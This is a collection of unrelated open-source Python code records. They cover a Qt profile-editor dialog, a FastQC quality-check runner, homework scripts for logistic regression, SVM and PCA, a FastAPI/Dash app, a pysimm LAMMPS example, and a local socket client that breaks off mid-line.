self.cbShowLabel.setChecked(field.show_label)\n self.lineLabel.setText(field.name)\n if field.emoji:\n self.lineEmoji.setText(emoji.emojize(field.emoji))\n else:\n self.lineEmoji.clear()\n if field.custom:\n if field.type == TemplateFieldType.TEXT_SELECTION:\n self.wdgChoicesEditor.setModel(TemplateFieldSelectionModel(field))\n self.wdgChoicesEditor.setVisible(True)\n else:\n self.wdgChoicesEditor.setHidden(True)\n else:\n self.wdgChoicesEditor.setHidden(True)\n\n def _placeholder_selected(self):\n self._selected_field = None\n self.stackedSettings.setCurrentWidget(self.pageInfo)\n self.btnRemove.setDisabled(True)\n\n def _remove_field(self):\n self._enable_in_inventory(self._selected_field, True)\n self.profile_editor.removeSelected()\n self._selected_field = None\n self.stackedSettings.setCurrentWidget(self.pageInfo)\n self.btnRemove.setDisabled(True)\n\n def _restore_default(self):\n if ask_confirmation('Are you sure you want to restore the default profile? 
Your current changes will be lost.'):\n self._restore_requested = True\n self.accept()\n\n def _show_label_clicked(self, checked: bool):\n if self._selected_field:\n self._selected_field.show_label = checked\n self.profile_editor.setShowLabelForSelected(checked)\n if self._selected_field.custom:\n self.lineLabel.setEnabled(checked)\n\n def _label_edited(self, text: str):\n if self._selected_field:\n self._selected_field.name = text\n self.profile_editor.updateLabelForSelected(text)\n\n def _emoji_edited(self, emoji_str: str):\n alias = emoji.demojize(emoji_str)\n if alias.startswith(':'):\n self._selected_field.emoji = alias\n self.profile_editor.updateEmojiForSelected(alias)\n else:\n self.lineEmoji.clear()\n\n\ndef customize_character_profile(novel: Novel, index: int, parent=None) -> bool:\n profile = CharacterProfileEditorDialog(novel.character_profiles[index],\n parent).display()\n if profile:\n novel.character_profiles[index] = profile\n RepositoryPersistenceManager.instance().update_novel(novel)\n\n return True\n return False\n","repo_name":"plotlyst/plotlyst-app","sub_path":"src/main/python/plotlyst/view/dialog/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":9528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"43323433834","text":"# encoding: utf-8\n#author: Tobias Andermann, tobias.andermann@bioenv.gu.se\n\"\"\"\nThis script runs a fastqc test on all fastq samples in a user-provided folder and creates an overview plot\n\"\"\"\n\nimport matplotlib\nmatplotlib.use('Agg')\n\nimport os\nimport sys\nimport glob\nimport shutil\nimport configparser\nfrom .utils import CompletePath\nimport subprocess\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import colors\nimport zipfile\nimport collections\n\n\ndef add_arguments(parser):\n parser.add_argument(\n '--input',\n required=True,\n action=CompletePath,\n default=None,\n help='The directory containing fastq files'\n )\n parser.add_argument(\n '--cores',\n type=int,\n default=1,\n help='Number of computational cores for parallelization of computation.'\n )\n parser.add_argument(\n '--output',\n required=True,\n action=CompletePath,\n default=None,\n help='The output directory where quality-test results will be saved'\n )\n\ndef get_test_results(fastqc_log_content):\n test_results = [i for i in fastqc_log_content if i.startswith('>>')]\n test_names = [string.split('\\t')[0].replace('>>','') for string in test_results if not string == '>>END_MODULE']\n test_results = [string.split('\\t')[-1] for string in test_results if not string == '>>END_MODULE']\n return test_names,test_results\n\ndef plot_fastqc_results(fastqc_out_folder):\n zip_files = []\n for root, dirnames, filenames in os.walk(fastqc_out_folder):\n for filename in [i for i in filenames if '.zip' in i]:\n zip_files.append(os.path.join(root, filename))\n sample_test_results_dict = {}\n for file in zip_files:\n sample_name = file.split('/')[-1].replace('_fastqc.zip','')\n archive = zipfile.ZipFile(file,'r')\n target_file = [i for i in archive.namelist() if i.endswith('fastqc_data.txt')][0]\n fastqc_log = archive.read(target_file)\n fastqc_log_formatted = str(fastqc_log).replace('\\\\t','\\t').split('\\\\n')\n labels,results = get_test_results(fastqc_log_formatted)\n num_results = [0 if i == 'pass' else i for i in results]\n num_results = [1 if i == 'warn' else i for i in num_results]\n num_results = [2 if i == 'fail' else i for i in num_results]\n 
sample_test_results_dict[sample_name] = num_results\n\n label_abbrevations = []\n for i in labels:\n split_string = i.split(' ')\n abbrevation = []\n for j in split_string:\n letter = j[0]\n abbrevation.append(letter)\n abbrevation = ''.join(abbrevation)\n label_abbrevations.append(abbrevation)\n # plot the sample overview\n ordered_dict = collections.OrderedDict(sorted(sample_test_results_dict.items()))\n samples = list(ordered_dict.keys())\n values = np.array(list(ordered_dict.values()))\n\n fig = plt.figure(figsize=(8,len(samples)))\n plt.imshow(values, interpolation='nearest', cmap=colors.ListedColormap(['green','yellow','red']))\n plt.yticks(list(range(values.shape[0])), samples)\n plt.xticks(list(range(values.shape[1])), label_abbrevations)\n plt.xlabel('FastQC test (abbrevated names)')\n plt.ylabel('Sample name')\n plt.title('FastQC results by sample')\n fig.savefig(os.path.join(fastqc_out_folder,'quality_summary_all_samples_1.pdf'), dpi = 500,transparent=True,bbox_inches='tight')\n\n # plot the test overview\n all_pass_counts = [list(col).count(0) for col in values.T]\n all_warn_counts = [list(col).count(1) for col in values.T]\n all_fail_counts = [list(col).count(2) for col in values.T]\n\n barWidth=0.3\n r2 = np.arange(len(all_pass_counts))\n r1 = [x - barWidth for x in r2]\n r3 = [x + barWidth for x in r2]\n\n fig = plt.figure(figsize=(8,1+len(samples)/8))\n plt.bar(r1, all_pass_counts, color='green', width=barWidth, edgecolor='black', label='pass')\n plt.bar(r2, all_warn_counts, color='yellow', width=barWidth, edgecolor='black', label='warn')\n plt.bar(r3, all_fail_counts, color='red', width=barWidth, edgecolor='black', label='fail')\n plt.xticks(list(range(values.shape[1])), label_abbrevations)\n for border in np.array(r3)+0.66*barWidth:\n plt.axvline(border,color='black',linestyle='--',alpha=0.5)\n #plt.yticks(range(len(samples)+1), range(len(samples)+1))\n plt.xlim(0-barWidth-0.75*barWidth,)\n plt.xlabel('FastQC test (abbrevated names)')\n plt.ylabel('number of samples')\n plt.title('FastQC results by test type')\n #plt.legend()\n fig.savefig(os.path.join(fastqc_out_folder,'quality_summary_all_samples_2.pdf'), dpi = 500,transparent=True,bbox_inches='tight')\n\ndef main(args):\n # Set working directory\n out_folder = args.output\n cores = args.cores\n if not os.path.exists(out_folder):\n os.makedirs(out_folder)\n # Get list of all fastq-files\n input_folder = args.input\n matches = []\n for root, dirnames, filenames in os.walk(input_folder):\n for filename in [i for i in filenames if '.fastq' in i]:\n if not '-single.fastq' in filename:\n matches.append(os.path.join(root, filename))\n if len(matches) == 0:\n print('No files with the ending .fastq found in input folder. 
Please check path and ensure that all readfiles are unzipped and have the filending \".fastq\"')\n sys.exit()\n fastq_df = pd.DataFrame(index=np.arange(0,len(matches)), columns=['filepaths'])\n fastq_df['filepaths'] = matches\n fastq_list_path = os.path.join(out_folder,'fastq_file_list.txt')\n fastq_df.to_csv(fastq_list_path,index=False,header=False,sep='\\t')\n\n # run FASTQC\n fastqc_cmd = [\n 'fastqc -t %i -o %s -f fastq $(cat %s)' %(cores,out_folder,fastq_list_path)\n ]\n with open(os.path.join(out_folder, \"fastqc_screen_out.txt\"), 'w') as log_err_file:\n p = subprocess.Popen(fastqc_cmd, stdout=log_err_file, stderr=log_err_file, shell=True)\n p.communicate()\n\n plot_fastqc_results(out_folder)\n","repo_name":"AntonelliLab/seqcap_processor","sub_path":"secapr/quality_check.py","file_name":"quality_check.py","file_ext":"py","file_size_in_byte":6001,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"78"} +{"seq_id":"41747774531","text":"from itertools import combinations\n\ndef solution(dots):\n lines = list(combinations(dots, 2))\n for i in range(3):\n p1 = lines[i][0]\n p2 = lines[i][1]\n p3 = lines[-(i+1)][0]\n p4 = lines[-(i+1)][1]\n if p2[0]-p1[0] == 0 and p4[0]-p3[0] == 0:\n return 1\n elif p2[0]-p1[0] == 0 or p4[0]-p3[0] == 0:\n continue\n else:\n gradi1 = (p2[1]-p1[1])/(p2[0]-p1[0])\n gradi2 = (p4[1]-p3[1])/(p4[0]-p3[0])\n if gradi1 == gradi2:\n return 1\n return 0","repo_name":"rhc716/algorithm","sub_path":"프로그래머스/lv0/120875. 평행/평행.py","file_name":"평행.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25118326211","text":"import random\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nimport scipy.io as sio\nimport time\nfrom sklearn.svm import SVC\n\n#data matrices\nq1_dataset = sio.loadmat('q1_dataset.mat')\nhog_features_train = q1_dataset['hog_features_train']\nhog_features_test = q1_dataset['hog_features_test']\ninception_features_train = q1_dataset['inception_features_train']\ninception_features_test = q1_dataset['inception_features_test']\nsuperclass_labels_train = q1_dataset['superclass_labels_train']\nsuperclass_labels_test = q1_dataset['superclass_labels_test']\nsubclass_labels_train = q1_dataset['subclass_labels_train']\nsubclass_labels_test = q1_dataset['subclass_labels_test']\n\n#upon inspection hog features are standardized but inception is not. 
Thus Standardizing inception\ninception_features_train = (inception_features_train - np.mean(inception_features_train, axis=0)) / np.std(inception_features_train, axis=0)\ninception_features_test = (inception_features_test - np.mean(inception_features_test, axis=0)) / np.std(inception_features_test, axis=0)\n\ndef sigmoid(x):\n return 1.0 / (1.0 + np.exp(-x))\n\ndef hyp(w, X):\n return sigmoid(np.dot(X, w))\n\ndef gradAscent(w, X, Y, batchSize=1, iters=1000, alpha=0.001, gType='mini'):\n dataSet = np.c_[X,Y]\n for i in range(iters):\n if (gType == 'batch' and (i+1) % 100 == 0):\n print(\"Weights at i = \", i+1, \" :\", w)\n startLoc = 0\n if (batchSize < X.shape[0]):\n dataSet = dataSet[np.random.permutation(dataSet.shape[0]),:]\n for j in range(int(X.shape[0] / batchSize)):\n x = dataSet[startLoc:startLoc + batchSize, :-1]\n y = dataSet[startLoc:startLoc + batchSize, -1]\n startLoc = (startLoc + batchSize) % X.shape[0]\n w = w + alpha * np.dot(x.T, y - hyp(w, x)) \n return w\n\ndef initialW(mean, sigma, size):\n return np.random.normal(mean, sigma, size)\n\ndef trainLogistic(X,y, batchSize=1, alpha=0.0001, gType='mini'):\n biasedX = np.c_[np.ones((X.shape[0], 1)), X]\n w = initialW(0, 0.01, biasedX.shape[1])\n w = gradAscent(w, biasedX, y, batchSize, alpha=alpha, gType=gType)\n return w\n\ndef testLogistic(w, X, y):\n biasedX = np.c_[np.ones((X.shape[0], 1)), X]\n predictions = ((hyp(w, biasedX) >= 0.5).astype(int)).flatten()\n print(\"Accuracy: \", np.mean(predictions == y) * 100)\n TP = sum(predictions[np.where(predictions == y)] == 1)\n TN = sum(predictions[np.where(predictions == y)] == 0)\n FP = sum(predictions[np.where(predictions != y)] == 1)\n FN = sum(predictions[np.where(predictions != y)] == 0)\n precision = TP / (TP + FP)\n recall = TP / (TP + FN)\n NPV = TN / (FN + TN)\n FPR = FP / (TP + FP)\n FDR = FP / (FN + TN)\n F1 = 2 * precision * recall / (precision + recall)\n F2 = 5 * precision * recall / ((4 * precision) + recall)\n print(\"Precision: \", precision)\n print(\"Recall: \", recall)\n print(\"NPV: \", NPV)\n print(\"FPR: \", FPR)\n print(\"FDR: \", FDR)\n print(\"F1: \", F1)\n print(\"F2: \", F2)\n print(\"----Confusion Matrix----\")\n print(\"TP: \", TP, \"FP: \", FP)\n print(\"FN: \", FN, \"TN: \", TN)\n# Q1.1 \n# mini batch with NN features\nprint(\"---------Mini Batch NN Features---------\")\nstart = time.time()\nw = trainLogistic(inception_features_train, superclass_labels_train.flatten(), 25, 0.0001)\ntestLogistic(w, inception_features_test, superclass_labels_test.flatten())\nend = time.time()\nprint(\"took \", end - start, \" seconds to finsh.\")\n\n# stochastic with NN features\nprint(\"---------Stochastic NN Features---------\")\nstart = time.time()\nw = trainLogistic(inception_features_train, superclass_labels_train.flatten(), 1, 0.0001)\ntestLogistic(w, inception_features_test, superclass_labels_test.flatten())\nend = time.time()\nprint(\"took \", end - start, \" seconds to finsh.\")\n\n# mini batch with HOG features\nprint(\"---------Mini Batch HOG Features---------\")\nstart = time.time()\nw = trainLogistic(hog_features_train, superclass_labels_train.flatten(), 25, 0.0001)\ntestLogistic(w, hog_features_test, superclass_labels_test.flatten())\nend = time.time()\nprint(\"took \", end - start, \" seconds to finsh.\")\n\n# stochastic with HOG features\nprint(\"---------Stochastic HOG Features---------\")\nstart = time.time()\nw = trainLogistic(hog_features_train, superclass_labels_train.flatten(), 1, 0.0001)\ntestLogistic(w, hog_features_test, 
superclass_labels_test.flatten())\nend = time.time()\nprint(\"took \", end - start, \" seconds to finsh.\")\n\n# Q 1.2\n# batch with NN features\nprint(\"---------Batch NN Features---------\")\nstart = time.time()\nw = trainLogistic(inception_features_train, superclass_labels_train.flatten(), inception_features_train.shape[0], 0.001, gType='batch')\nind = np.argpartition(w, -10)[-10:]\nprint(\"Indices of 10 most important features: \", ind)\ntestLogistic(w, inception_features_test, superclass_labels_test.flatten())\nend = time.time()\nprint(\"took \", end - start, \" seconds to finsh.\")\n\n# batch with HOG features\nprint(\"---------Batch HOG Features---------\")\nstart = time.time()\nw = trainLogistic(hog_features_train, superclass_labels_train.flatten(), hog_features_train.shape[0], 0.0001, gType='batch')\nind = np.argpartition(w, -10)[-10:]\nprint(\"Indices of 10 most important features: \", ind)\ntestLogistic(w, hog_features_test, superclass_labels_test.flatten())\nend = time.time()\nprint(\"took \", end - start, \" seconds to finsh.\")\n\n\n#Q 1.3 Stratified K fold\ndef stratified_k_fold(X, Y, k):\n dataSet = np.c_[X,Y]\n labels = np.unique(Y)\n data_labels = []\n for label in labels:\n data_label_set = dataSet[np.asarray(np.where(dataSet[:, -1] == label))].squeeze()\n data_labels.append(np.random.permutation(data_label_set))\n \n data_K = []\n for i in range(k):\n data = np.ones((1,dataSet.shape[1]))\n for data_label in data_labels:\n fold_cut = int(math.ceil(data_label.shape[0] / k))\n data = np.vstack([data, data_label[i * fold_cut:((i+1) * fold_cut), :]])\n data_K.append(np.random.permutation(data[1:, :]))\n \n return data_K\n\n\n#SVM model helper methods\ndef getLeftOut(data_K, i):\n data_K = np.asarray(data_K)\n train = [x for x in range(len(data_K)) if x != i]\n return data_K[np.asarray(train)], data_K[i]\n \ndef SVM_train_k_fold(data_K, C=1.0, kernel='linear', degree=3, gamma=2):\n accuracy = []\n for i in range (len(data_K)):\n train, test = getLeftOut(data_K, i)\n train = train.reshape((-1, test.shape[1]))\n svclassifier = SVC(C=C, kernel=kernel, degree=degree, gamma=gamma)\n svclassifier.fit(train[:, :-1], train[:, -1])\n final_prediction = svclassifier.predict(test[:, :-1])\n accuracy.append(np.mean(final_prediction == test[:,-1]) * 100)\n return np.mean(accuracy)\n \ndef SVM_train(X, Y, C=None, kernel='linear', degree=None, gamma=None, k_folds=5):\n data_K = stratified_k_fold(X, Y, k_folds)\n accuracies = []\n if kernel is 'linear':\n for c in C:\n accuracies.append(SVM_train_k_fold(data_K, C=c, kernel='linear'))\n print(\"C: \", c, \" Accuracy: \", accuracies[-1])\n C_final = C[np.argmax(accuracies)]\n print(\"fin_C: \", C_final)\n svclassifier = SVC(C=C_final, kernel='linear')\n elif kernel is 'rbf':\n for c in C:\n for g in gamma:\n accuracies.append(SVM_train_k_fold(data_K, C=c, kernel='rbf', gamma=g))\n print(\"C: \", c, \" G: \", g, \" Accuracy: \", accuracies[-1])\n loc = np.argmax(accuracies)\n C_final = C[(int)(loc / len(gamma))]\n if len(C) is 1:\n gamma_final = gamma[loc]\n else:\n gamma_final = gamma[loc % len(C)]\n print(\"fin_C: \", C_final, \" fin_gamma: \", gamma_final)\n svclassifier = SVC(C=C_final, kernel='rbf', gamma=gamma_final)\n elif kernel is 'poly':\n for d in degree:\n for g in gamma:\n accuracies.append(SVM_train_k_fold(data_K, C=C[0], kernel='poly', gamma=g, degree=d))\n print(\"C: \", C[0], \" G: \", g, \" D: \", d, \" Accuracy: \", accuracies[-1])\n loc = np.argmax(accuracies)\n degree_final = degree[(int)(loc / len(gamma))]\n gamma_final = 
gamma[loc % len(degree)]\n print(\"fin_degree: \", degree_final, \" fin_gamma: \", gamma_final, \" fin_C: \", C[0])\n svclassifier = SVC(C=C[0], kernel='poly', gamma=gamma_final, degree=degree_final)\n svclassifier.fit(X, Y)\n return svclassifier\n\ndef con_mat(final_prediction, y):\n u = np.unique(y)\n confusion_matrix = np.zeros((u.shape[0],u.shape[0]))\n for i in range(u.shape[0]**2):\n predicted = (int)(i / u.shape[0])\n actual = i % u.shape[0]\n pred_loc = np.array(np.where(final_prediction == (u.shape[0] - 1 - predicted))).flatten()\n act_loc = np.array(np.where(y == (u.shape[0] - 1 - actual))).flatten()\n val = (np.array(np.intersect1d(pred_loc, act_loc)).flatten()).shape[0]\n confusion_matrix[predicted][actual] = val\n return confusion_matrix\n\ndef SVM_test(classifier, X, y):\n final_prediction = classifier.predict(X)\n u = np.unique(y)\n confusion_matrix = con_mat(final_prediction, y)\n \n \n print(\"----Confusion Matrix----\")\n if u.shape[0] == 2:\n print(confusion_matrix)\n print(\"Accuracy: \", np.mean(final_prediction == y) * 100)\n precision = confusion_matrix[0][0] / (confusion_matrix[0][0] + confusion_matrix[0][1])\n recall = confusion_matrix[0][0] / (confusion_matrix[0][0] + confusion_matrix[1][0])\n print(\"Precision: \", precision)\n print(\"Recall: \", recall)\n else:\n print(np.flipud(np.fliplr(confusion_matrix)))\n print('Accuracy, avg: ', np.sum(confusion_matrix.diagonal() * 100/confusion_matrix.sum(axis=0))/u.shape[0])\n y_class = np.zeros((u.shape[0], y.shape[0]))\n pred_class = np.zeros((u.shape[0], y.shape[0]))\n TP = []\n FP = []\n FN = []\n precisions = []\n recalls = []\n F1s = []\n print('Accuracy, class:', confusion_matrix.diagonal() * 100/confusion_matrix.sum(axis=0))\n for i in range(u.shape[0]):\n y_class[i][np.array(np.where(y == u[i]))] = 1\n pred_class[i][np.array(np.where(final_prediction == u[i]))] = 1\n TP.append(sum(pred_class[i][np.where(pred_class[i] == y_class[i])] == 1))\n FP.append(sum(pred_class[i][np.where(pred_class[i] != y_class[i])] == 1))\n FN.append(sum(pred_class[i][np.where(pred_class[i] != y_class[i])] == 0))\n precisions.append(TP[-1] / (TP[-1] + FP[-1]))\n recalls.append(TP[-1] / (TP[-1] + FN[-1]))\n F1s.append(2 * precisions[-1] * recalls[-1] / (precisions[-1] + recalls[-1]))\n precision_macro = np.sum(np.array(precisions)) / len(precisions)\n recall_macro = np.sum(np.array(recalls)) / len(recalls)\n F1_macro = np.sum(np.array(F1s)) / len(F1s)\n precision_micro = np.sum(np.array(TP)) / (np.sum(np.array(TP)) + np.sum(np.array(FP)))\n recall_micro = np.sum(np.array(TP)) / (np.sum(np.array(TP)) + np.sum(np.array(FN)))\n F1_micro = 2 * precision_micro * recall_micro / (precision_micro + recall_micro)\n print(\"Precision_micro: \", precision_micro)\n print(\"Precision_macro: \", precision_macro)\n print(\"Recall_micro: \", recall_micro)\n print(\"Recall_macro: \", recall_macro)\n print(\"F1_micro: \", F1_micro)\n print(\"F1_macro: \", F1_macro)\n \n#Superclass Classification\n# Q 1.4 Soft Margin SVM Linear kernel\nprint(\"---------Soft Margin SVM Linear Kernel Hog---------\")\nstart = time.time()\nclassifier = SVM_train(hog_features_train, superclass_labels_train.flatten(), C=[0.01, 0.1, 1, 10, 100])\nSVM_test(classifier, hog_features_test, superclass_labels_test.flatten())\nend = time.time()\nprint(\"took \", end - start, \" seconds to finsh.\")\n\nprint(\"---------Soft Margin SVM Linear Kernel NN---------\")\nstart = time.time()\nclassifier = SVM_train(inception_features_train, superclass_labels_train.flatten(), C=[0.01, 0.1, 1, 
10, 100])\nSVM_test(classifier, inception_features_test, superclass_labels_test.flatten())\nend = time.time()\nprint(\"took \", end - start, \" seconds to finsh.\")\n\n# Q 1.5 Hard Margin SVM RBF kernel\nprint(\"---------Hard Margin SVM RBF Kernel Hog---------\")\nstart = time.time()\nclassifier = SVM_train(hog_features_train, superclass_labels_train.flatten(), C=[1e10], kernel='rbf', gamma=[2**(-4), 2**(-3), 2**(-2), 2**(-1), 2**(0), 2**(1), 2**(6)])\nSVM_test(classifier, hog_features_test, superclass_labels_test.flatten())\nend = time.time()\nprint(\"took \", end - start, \" seconds to finsh.\")\n\nprint(\"---------Hard Margin SVM RBF Kernel NN---------\")\nstart = time.time()\nclassifier = SVM_train(inception_features_train, superclass_labels_train.flatten(), C=[1e10], kernel='rbf', gamma=[2**(-4), 2**(-3), 2**(-2), 2**(-1), 2**(0), 2**(1), 2**(6)])\nSVM_test(classifier, inception_features_test, superclass_labels_test.flatten())\nend = time.time()\nprint(\"took \", end - start, \" seconds to finsh.\")\n\n# Q 1.6 Soft Margin SVM RBF kernel\nprint(\"---------Soft Margin SVM RBF Kernel Hog---------\")\nstart = time.time()\nclassifier = SVM_train(hog_features_train, superclass_labels_train.flatten(), C=[10**(-2), 1, 10**(2)], kernel='rbf', gamma=[2**(-2), 2, 2**(6)])\nSVM_test(classifier, hog_features_test, superclass_labels_test.flatten())\nend = time.time()\nprint(\"took \", end - start, \" seconds to finsh.\")\n\nprint(\"---------Soft Margin SVM RBF Kernel NN---------\")\nstart = time.time()\nclassifier = SVM_train(inception_features_train, superclass_labels_train.flatten(), C=[10**(-2), 1, 10**(2)], kernel='rbf', gamma=[2**(-2), 2, 2**(6)])\nSVM_test(classifier, inception_features_test, superclass_labels_test.flatten())\nend = time.time()\nprint(\"took \", end - start, \" seconds to finsh.\")\n\n\n# Subclass Classification\n# Q 1.7 Soft Margin SVM RBF one vs all kernel\nprint(\"---------Soft Margin SVM RBF Kernel one vs all Hog---------\")\nstart = time.time()\nclassifier = SVM_train(hog_features_train, subclass_labels_train.flatten(), C=[10**(-2), 1, 10**(2)], kernel='rbf', gamma=[2**(-2), 2, 2**(6)])\nSVM_test(classifier, hog_features_test, subclass_labels_test.flatten())\nend = time.time()\nprint(\"took \", end - start, \" seconds to finsh.\")\n\nprint(\"---------Soft Margin SVM RBF Kernel one vs all NN---------\")\nstart = time.time()\nclassifier = SVM_train(inception_features_train, subclass_labels_train.flatten(), C=[10**(-2), 1, 10**(2)], kernel='rbf', gamma=[2**(-2), 2, 2**(6)])\nSVM_test(classifier, inception_features_test, subclass_labels_test.flatten())\nend = time.time()\nprint(\"took \", end - start, \" seconds to finsh.\")\n\n# Q 1.8 Hard Margin SVM Poly one vs all kernel\nprint(\"---------Hard Margin SVM poly Kernel one vs all Hog---------\")\nstart = time.time()\nclassifier = SVM_train(hog_features_train, subclass_labels_train.flatten(), C=[1e10], degree=[3, 5, 7], kernel='poly', gamma=[2**(-2), 2, 2**(6)])\nSVM_test(classifier, hog_features_test, subclass_labels_test.flatten())\nend = time.time()\nprint(\"took \", end - start, \" seconds to finsh.\")\n\nprint(\"---------Hard Margin SVM poly Kernel one vs all NN---------\")\nstart = time.time()\nclassifier = SVM_train(inception_features_train, subclass_labels_train.flatten(), C=[1e10], degree=[3, 5, 7], kernel='poly', gamma=[2**(-2), 2, 2**(6)])\nSVM_test(classifier, inception_features_test, subclass_labels_test.flatten())\nend = time.time()\nprint(\"took \", end - start, \" seconds to finsh.\")\n\n#Q2\ndef pltImg(X, 
label, fig, j):\n for i in range(j,j+5):\n img = (X[i%5,:]).reshape((85,125))\n img1 = fig.add_subplot(3, 5, i+1) \n img1.set_title(label+\" \"+str(i%5+1))\n plt.imshow(img)\n return i + 1\n\nq2_dataset = sio.loadmat('q2_dataset.mat')\nX = q2_dataset['data']\nX = X.reshape((150, 10625))\nfig = plt.figure(figsize=(85, 125))\nj = pltImg(X,\"Original\", fig, 0)\n\n#2.1 SVD based\nstart = time.time()\nU, S, VT = np.linalg.svd(X)\nend = time.time()\n\nSigma = np.zeros((X.shape[0], X.shape[1]))\nSigma[:, :X.shape[0]] = np.diag(S)\nprint(\"---------SVD based---------\")\nprint(\"MSE: \", ((X - np.dot(U, np.dot(Sigma, VT)))**2).mean())\nprint(\"took \", end - start, \" seconds to finsh.\")\nj = pltImg(np.dot(U, np.dot(Sigma, VT)),\"SVD\", fig, j)\n\n#2.2 cov based\nstart = time.time()\nm = np.mean(X, axis=0)\nX_mean = X - m\nX_cov = np.cov(X_mean.transpose())\neig_val, eig_vec = np.linalg.eig(X_cov)\nend = time.time()\n\nreduced_X = np.dot(X_mean, eig_vec.transpose())\nreconstructed_X = (np.dot(reduced_X, eig_vec)).real + m\nprint(\"---------Covariance based---------\")\nprint(\"MSE: \", ((X - reconstructed_X)**2).mean())\nprint(\"took \", end - start, \" seconds to finsh.\")\nj = pltImg(reconstructed_X,\"COV\", fig, j)\n\nplt.show()\n","repo_name":"usman-kakakhel/ML-CS464-Bilkent","sub_path":"hw2/q1_2.py","file_name":"q1_2.py","file_ext":"py","file_size_in_byte":16656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11687185873","text":"from fastapi import FastAPI, APIRouter\nfrom fastapi.middleware.wsgi import WSGIMiddleware\nfrom fastapi.encoders import jsonable_encoder\nfrom fastapi.responses import JSONResponse\n\nfrom pydantic import BaseModel\n\nimport dash \nfrom dash.dependencies import Input, Output\nimport dash_core_components as dcc\nimport dash_html_components as html\n\n\nclass Link(BaseModel):\n title: str\n url: str\n\n\n# Create the Dash application, make sure to adjust requests_pathname_prefix\napp_dash = dash.Dash(__name__, requests_pathname_prefix='/dash/')\napp_dash.layout = html.Div(children=[\n html.H1(children='Hello Dash'),\n\n html.Div(children='''\n Dash: A web application framework for Python.\n '''),\n\n dcc.Graph(\n id='example-graph',\n figure={\n 'data': [\n {'x': [1, 2, 3], 'y': [4, 1, 2], 'type': 'bar', 'name': 'SF'},\n {'x': [1, 2, 3], 'y': [2, 4, 5],\n 'type': 'bar', 'name': u'Montréal'},\n ],\n 'layout': {\n 'title': 'Dash Data Visualization'\n }\n }\n )\n])\n\napp = FastAPI()\n\n\n@app.get(\"/\")\ndef read_root():\n link_list: Links = [{'title': \"api-test-routes\",\n 'url': \"https://fastapi-prototyping.herokuapp.com/docs\"},\n {'title': 'supermarket-dashboard',\n 'url': 'https://fastapi-prototyping.herokuapp.com/dash'}]\n return JSONResponse(content=jsonable_encoder(link_list))\n\n\n@app.post('/dialogflow/fulfillment/payment')\ndef dialogflow_scb_payment(request):\n return {k: v for k, v in request}\n\n\n# Now mount you dash server into main fastapi application\napp.mount(\"/dash\", WSGIMiddleware(app_dash.server))\n","repo_name":"kakamband/fastapi-heroku","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"40205678165","text":"import os\nfrom pysimm import system, lmps\n\n\ndef run(test=False):\n logFileName = 'steps.log'\n \n # use an import from .yaml to get of previously created pmma-based 4-chain polymer structure\n polymer = 
system.read_yaml(os.path.join(os.path.dirname(os.path.realpath(__file__)), \"polymer.yaml\"))\n polymer.forcefield = 'dreiding'\n \n # Initialize the wrapper object around the polymer that will organize the work with LAMMPS\n print('Creating Simulation object with log-file in \"{0:s}\"'.format(logFileName))\n sim = lmps.Simulation(polymer, log='steps.log')\n \n # setting up the parameters for the energy optimization\n # add_min() method will add the \"Minimization\" task to the task que of the \n # Simulation object that is stored in sim.sim list\n print('Creating and running energy-minimization task:')\n sim.add_min(min_style='cg', name='minimization', etol=1.0e-5, ftol=1.0e-5)\n \n print('Creating and running molecular dynamics task:')\n # Let's set up the Molecular dynamics task\n sim.add_md(ensemble='nvt', timestep=1.0)\n \n print('List of simulation tasks ready to run:')\n print(sim.sim)\n \n print('Input that will be passed to LAMMPS when the simulation is performed:')\n sim.write_input()\n print(sim.input)\n \n # call run to run the simulation\n sim.run()\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"polysimtools/pysimm","sub_path":"Examples/07_lammps_simulation/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"78"} +{"seq_id":"14432895704","text":"#!coding=utf-8\r\n\r\nimport socket\r\nimport os\r\nimport sys\r\nimport struct\r\nimport pandas as pd\r\nimport json\r\n\r\ndef socket_client():\r\n ## 开始链接,127.0.0.1,9001表示本机的端口这里不用修改\r\n try:\r\n s = socket.socket()\r\n s.connect(('127.0.0.1', 9001))\r\n except socket.error as msg:\r\n print(msg)\r\n sys.exit(1)\r\n ## 服务器第一次回信,会收到welcome代表连上\r\n print(s.recv(1024))\r\n ## 给边缘设备发送的内容:epoch数、learning_rate大小,以及从excel读取的data数据,存放在send_dic字典中(可添加新的内容:send_dic['xxx']=xxx)\r\n param = pd.read_excel('param.xlsx')\r\n epoch=20\r\n learning_rate = 0.01\r\n param['迭代次数'][0] = epoch\r\n param['学习率'][0] = learning_rate\r\n df = pd.read_excel('测试数据集/测试数据集/任务三data.xlsx')\r\n id = 1000000001\r\n\r\n data = []\r\n true_data = []\r\n for i in range(len(df['用户编号'])):\r\n if i != len(df['用户编号']) - 1:\r\n if df['用户编号'][i] == id:\r\n true_data.append(int(df['缴费金额(元)'][i]))\r\n else:\r\n id = df['用户编号'][i]\r\n data.append(true_data)\r\n true_data = []\r\n true_data.append(int(df['缴费金额(元)'][i]))\r\n else:\r\n true_data.append(int(df['缴费金额(元)'][i]))\r\n data.append(true_data)\r\n\r\n send_dic = {}\r\n send_dic['data']=data\r\n send_dic['learning_rate']=learning_rate\r\n send_dic['epoch']=epoch\r\n ## 将字典打包为字符串发过去\r\n json_string = json.dumps(send_dic)\r\n s.send(json_string.encode())\r\n\r\n\r\n ## 接受边缘设备的输出结果:画图所需的10个用户的损失(result['loss']),训练时间(result['spend_time']),以及预测值(result['pred'],这个就是你们之前写的存放在total数组中的数据)\r\n ## 8192表示一次可以接受到最大的byte数为8192,长度太长会被截断,可以调整\r\n result = 